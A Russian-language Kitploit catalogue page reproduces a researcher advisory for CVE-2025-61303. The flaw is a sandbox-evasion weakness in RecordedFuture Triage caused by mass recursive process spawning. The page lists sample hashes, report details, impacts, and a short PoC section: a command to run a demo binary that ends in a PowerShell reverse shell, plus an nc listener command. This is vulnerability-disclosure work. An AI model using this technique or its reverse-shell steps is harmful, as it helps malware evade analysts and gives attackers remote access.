Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-61303 — Критическая уязвимость (9.8) - движок динамического анализа RecordedFuture Triage может не фиксировать вредоносное поведение, когда образцы вызывают рекурсивное порождение процессов с очень высокой интенсивностью, что приводит к неполным или отсутствующим отчётам о поведении. | Kitploit
Инструменты/GitHubGitHub/egkritsis/cve-2025-61303
Динамический анализ (песочница)Анализ уязвимостейЭксплуатацияАнализ вредоносных программСтатьи и ИсследованияОбучение и Образование
GitHubegkritsis/cve-2025-61303

CVE-2025-61303

Критическая уязвимость (9.8) - движок динамического анализа RecordedFuture Triage может не фиксировать вредоносное поведение, когда образцы вызывают рекурсивное порождение процессов с очень высокой интенсивностью, что приводит к неполным или отсутствующим отчётам о поведении.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
249 месяцев назадЕщё не проверено
Поделиться

CVE-2025-61303 - RecordedFuture Triage: Отказ в анализе через рекурсивное порождение процессов

Описание

Песочница RecordedFuture Triage для Windows 10 сборки 2004 и Windows 10 LTSC 2021 содержит критическую уязвимость в своём движке поведенческого анализа Windows, которая позволяет отправленному образцу вредоносного ПО избежать обнаружения и вызвать отказ в анализе. Уязвимость срабатывает, когда образец рекурсивно порождает большое количество дочерних процессов, генерируя высокий объём журналов и истощая системные ресурсы. В результате ключевое вредоносное поведение, включая выполнение PowerShell и активность обратной оболочки, может не записываться или не сообщаться, вводя аналитиков в заблуждение и ставя под угрозу целостность и доступность результатов анализа в песочнице.


Оценка CVSS

CVSS v3.1: 9.8 (Критическая)


Вектор:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Авторы / Исследователи

  • Evgenios Gkritsis — Кафедра информатики, Афинский университет экономики и бизнеса, Греция
  • Constantinos Patsakis — Кафедра информатики, Университет Пирея, Греция
  • George Stergiopoulos — Кафедра информатики, Афинский университет экономики и бизнеса, Греция

Подробности

Образец vathos_rev.exe (SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b) демонстрирует состояние отказа в анализе в движке поведенческого анализа Windows платформы RecordedFuture Triage.
При запуске в конфигурациях Windows 10 образец рекурсивно порождает тысячи дочерних процессов, истощая ресурсы отслеживания процессов и журналирования. В результате песочница сообщает минимум поведенческих данных и не фиксирует ключевые вредоносные действия.


Окружение Windows 10 v2004

  • Платформа: win10v2004-20250610-en
  • Архитектура: x64
  • Макс. время ядра: 104s
  • Макс. время сети: 213s
  • Зафиксированная поведенческая оценка: 1/10
  • Обнаруженная сигнатура: "Suspicious use of WriteProcessMemory" (64 IoC)
  • Наблюдаемое поведение:
    • Непрерывная рекурсия процессов vathos_rev.exe
    • Не зафиксировано ни выполнения PowerShell, ни активности обратной оболочки
    • Ограниченный сетевой трафик (только стандартные DNS и HTTP-запросы)
    • Не зафиксировано ни C2-обратных вызовов, ни телеметрии полезной нагрузки

Окружение Windows 10 LTSC 2021

  • Платформа: win10ltsc2021-20250619-en
  • Архитектура: x64
  • Макс. время ядра: 105s
  • Макс. время сети: 215s
  • Зафиксированная поведенческая оценка: 1/10
  • Обнаруженная сигнатура: "Suspicious use of WriteProcessMemory" (64 IoC)
  • Наблюдаемая активность процессов:
    • Непрерывная рекурсия процессов vathos_rev.exe
    • Не зафиксировано ни выполнения PowerShell, ни активности обратной оболочки
    • Ограниченный сетевой трафик (только стандартные DNS и HTTP-запросы)
    • Не зафиксировано ни C2-обратных вызовов, ни телеметрии полезной нагрузки

В обеих средах песочницы Windows 10 детонация не смогла зафиксировать ожидаемые этапы выполнения PowerShell и обратной оболочки, несмотря на то, что вредоносное ПО выполняло эти действия на хосте.

Движок поведенческого анализа песочницы оказался насыщен рекурсивным порождением процессов, что привело к усечённой или отсутствующей телеметрии.

Это подтверждает уязвимость типа отказ в анализе: движок поведенческого анализа не сообщает о вредоносной активности при высокой рекурсии и объёме журналов, что приводит к ложноположительным результатам и неполным данным криминалистического исследования.

Ссылка на публичный отчёт:
https://tria.ge/250822-qfystshk51


Влияние

Это уязвимость типа отказ в анализе в RecordedFuture Triage, которая может привести к тому, что движок динамического анализа не сможет захватить или сообщить о поведенческой активности. Эксплуатация позволяет злоумышленникам обходить поведенческое обнаружение и получать неполные или отсутствующие отчёты анализа.

Ключевые последствия

  • Обход обнаружения: Вредоносное поведение может остаться незаписанным, из-за чего угрозы выглядят безобидными.
  • Ложная уверенность: Анализы с низкими оценками и отсутствующей телеметрией могут вводить аналитиков в заблуждение.
  • Многократное использование: Метод может быть встроен в загрузчики/дропперы и использован повторно в рамках кампаний.
  • Простота эксплуатации: Воспроизводимо без глубоких знаний, что увеличивает риск массового злоупотребления.

Последствия для дальнейшего анализа

  • Пропущенные IoC
  • Неправильная классификация сложных угроз
  • Неполные криминалистические хронологии

Затронутые продукты

  • Продукт: RecordedFuture Triage (Платформа динамического анализа)
  • Затронутый компонент: Движок поведенческого анализа Windows
  • Образец вредоносного ПО: vathos_rev.exe
    • SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b
    • MD5: dca2fc8f69f6493c7a9c1ce9a68b2454
    • SHA1: 9b4688ba4788e34bce47d91b0accc98d33dbf8d2
    • SHA512: 924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b
    • Размер: 270 КБ

Наблюдаемые уязвимые детонации (публичные отчёты Triage)

Окружение Windows 10 LTSC 2021

  • ID отчёта: 250822-qfystshk51
  • Платформа: win10ltsc2021-20250619-en
  • Архитектура: x64
  • Отправлено: 2025-08-22 13:12 UTC
  • Сообщено: 2025-08-22 13:18 UTC

Окружение Windows 10 версии 2004

  • ID отчёта: 250822-qfystshk51
  • Платформа: win10v2004-20250610-en
  • Архитектура: x64
  • Отправлено: 2025-08-22 13:12 UTC
  • Сообщено: 2025-08-22 13:18 UTC

Примечание: Сведения о сборке движка и внутренней версии не раскрываются RecordedFuture публично.
Все наблюдения основаны на воспроизводимых публичных детонациях с платформы Triage компании RecordedFuture (отправка 250822-qfystshk51).


Доказательство концепции (PoC)

Краткое описание

Предоставленная демонстрация воспроизводит состояние отказа в анализе (DoA) за счёт генерации очень высокого объёма процессов и глубоко вложенной активности во время выполнения. Демонстрация порождает множество дочерних процессов и выполняет многоэтапное XOR-дешифрование перед финальным этапом обратной оболочки PowerShell. В уязвимых образах Windows 10 Triage финальный этап полезной нагрузки не записывается или усекается, тогда как другие образы (например, Windows 11) захватывают полное поведение.

Как запустить

root@kitploit:~
poc/vathos_demo.exe <IP> <PORT>

Запустите слушатель (например, nc -lvp 4444) на указанном IP/порту, чтобы наблюдать попытки подключения. Демонстрация порождает очень большое количество процессов и выполняет многоэтапное XOR-дешифрование, кульминацией которого является этап обратной оболочки PowerShell. В затронутых конфигурациях Triage финальный этап полезной нагрузки может не записываться, несмотря на то, что образец выполняет его на хосте.

Рисунок 1 - Панель обзора Triage Рисунок 1 - Панель обзора Triage

Рисунок 2 - Отчёт о поведении Windows 10 v2004 (минимальная телеметрия / пример DoA) Рисунок 2 - Отчёт win10 v2004 (минимальная телеметрия)

Рисунок 3 - Отчёт о поведении Windows 10 LTSC 2021 (минимальная телеметрия / пример DoA) Рисунок 3 - Отчёт win10 LTSC 2021 (минимальная телеметрия)

Рисунок 4 - Пример зарегистрированных процессов в Windows 10 LTSC (очищено, не все процессы зарегистрированы) — журналы анализа → Процессы Рисунок 4 - Зарегистрированные процессы в win10 LTSC (очищено)


Ссылки

  • Публичный анализ Triage: https://tria.ge/250822-qfystshk51
  • https://www.cve.org/CVERecord?id=CVE-2025-61303

Скачать инструмент